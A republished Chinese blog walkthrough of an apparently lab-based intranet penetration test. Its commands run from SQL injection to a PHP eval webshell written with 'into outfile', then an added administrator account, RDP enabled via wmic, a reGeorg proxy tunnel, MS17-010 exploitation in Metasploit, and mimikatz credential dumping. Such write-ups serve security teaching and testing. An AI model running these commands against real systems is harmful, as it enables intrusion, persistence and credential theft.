前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >一次内网渗透测试实验过程

一次内网渗透测试实验过程

作者头像
潇湘信安
发布2021-07-01 11:13:50
6940
发布2021-07-01 11:13:50
举报
文章被收录于专栏:潇湘信安

原文地址:

https://blog.csdn.net/weixin_44991517/article/details/90718228

声明:此次渗透环境为实验环境,仅供渗透实验参考

渗透测试过程

通过渗透网站拿到webshell,然后通过webshell拿到网站主机系统权限,发现受害主机有两张网卡,另一张网卡下有两台存活的内网主机,然后我们就尝试渗透存活的内网主机看能不能拿到系统权限,最后发现两台内网主机都开启了445端口,然后搜索了一下445端口漏洞发现有个最新的m17_010可能可以利用,结果真的通过ms17_010成功获得了内网主机的权限。

目标网站ip:192.168.31.196

浏览网站通过手工测试发现http://url/hr/hr.php?hrid=15处有注入点

图片
图片

尝试利用sqlmap工具跑一下这个注入点,看能不能注出有用的信息

图片
图片

通过测试发现这个注入点果然可以进行注入

图片
图片

然后利用该注入点进行尝试注出网站后台登录账号密码

图片
图片

发现跑出来的网站后台密码是用md5加密的,所以利用md5解密一下,发现只有两个权限较低的密码可以解密,而权限较高的admin账号解不开。不过问题不大,先用登录后台(后台登录界面可以用御剑跑出来)看一下

图片
图片

利用御剑跑出的后台目录里有个phpinfo页面,说不定可以得到一些有用的信息

图片
图片

发现可以得到网站文件的绝对路径

图片
图片

发现网站后台数据维护处可以执行sql语句,通过phpinfo页面知道了网站绝对路径,可以尝试在此处写入php一句话木马

代码语言:javascript
复制
select "<?php eval($_POST[123456]);?>" into outfile "/UPUPW_AP5.2/vhosts/jy.test.com/321.php" 
图片
图片

发现可以执行成功

图片
图片

尝试用蚁剑(菜刀也可以)连接,发现成功连接

图片
图片

利用蚁剑虚拟终端创建一个用户并将其加入到管理员组

代码语言:javascript
复制
net user ddd 123456 /add
net localgroup Administrators ddd /add
图片
图片

然后开启3389端口就可以通过3389端口远程控制目标机了

代码语言:javascript
复制
wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1
图片
图片

用netstat -an命令查看发现成功开启3389端口

图片
图片

用arp -a命令发现目标机有两块网卡,有一块网卡是内网ip,我们开始尝试渗透内网

图片
图片

内网渗透测试

目标机ip:192.168.238.129、192.168.238.130

kali攻击机ip:192.168.31.119

1. 测试思路

因为我们已经成功getshell了ip为192.168.31.196的主机,而238段的内网ip是它的另一块网卡下的主机,所以可以利用已经getshell的这台主机作为代理去渗透238段的主机

2. 渗透过程

利用蚁剑在该网站根目录上传一个reGeorgSocksProxy的php脚本文件

图片
图片

设置kali的proxychains代理地址和端口,命令:vi /etc/proxychains.conf将dynamic_chain前的#去掉

图片
图片

设置代理地址和端口后:wq退出

图片
图片

配置好后通过reGeory来打通本地和目标的通道,出现如下画面则连接成功

代码语言:javascript
复制
python reGeorgSocksProxy.py -p 9050 -l 0.0.0.0 -u http://192.168.31.196/tunnel.php
图片
图片

本地所有工具都可通过目标服务器进一步攻击所有工具使用命令前加 proxychains,这样kali的所有工具就如同全部在内网那台getshell的服务器上

图片
图片

用nmap扫描内网的两个ip开放的端口发现都有445端口,192.168.238.129为03系统 ,192.168.238.130为xp系统,这里以192.168.238.130这台主机为例

图片
图片

用msfconsole搜索发现445端口有一个ms17_010的漏洞,可以尝试反弹shell

图片
图片

设置好利用ms17_010所需要的参数

代码语言:javascript
复制
use exploit/windows/smb/ms17_010_psexec  #切换到ms17漏洞模块
set RHOST 192.168.238.130   #设置目标机ip
run   #开始连接
图片
图片

成功反弹到shell,然后就可以查看目标机的一些信息了

图片
图片

添加一个新用户名账号,发现成功添加

代码语言:javascript
复制
run getgui -u ding(用户名) -p 123456(密码)
图片
图片

利用mimikatz工具查看系统管理员账号密码

代码语言:javascript
复制
load mimikatz     #启动mimikatz
msv     #查看管理员密码hash
图片
图片

也可以利用mimikatz获取到密码明文

代码语言:javascript
复制
kerberos     #获取管理员密码明文
图片
图片

获取到明文管理员账号密码后就可以开启远程桌面用管理员账号密码进行登录系统了

图片
图片

成功远程登录到目标桌面

图片
图片
本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2021-05-20,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 潇湘信安 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
相关产品与服务
网站渗透测试
网站渗透测试(Website Penetration Test,WPT)是完全模拟黑客可能使用的攻击技术和漏洞发现技术,对目标系统的安全做深入的探测,发现系统最脆弱的环节。渗透测试和黑客入侵最大区别在于渗透测试是经过客户授权,采用可控制、非破坏性质的方法和手段发现目标和网络设备中存在弱点,帮助管理者知道自己网络所面临的问题,同时提供安全加固意见帮助客户提升系统的安全性。腾讯云网站渗透测试由腾讯安全实验室安全专家进行,我们提供黑盒、白盒、灰盒多种测试方案,更全面更深入的发现客户的潜在风险。
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档